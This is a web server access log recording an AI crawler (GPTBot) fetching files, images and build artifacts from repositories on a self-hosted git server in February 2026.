"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:17:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11566] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:17:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11569] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:17:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12180] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13543] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:17:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:17:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=newest" [Client 74.7.227.38] [Length 5463] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" +[17/Feb/2026:17:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=oldest" [Client 74.7.227.38] [Length 5472] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" +[17/Feb/2026:17:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:17:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11986] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" +[17/Feb/2026:17:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10311] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=source" [Client 74.7.227.38] [Length 14184] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:17:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 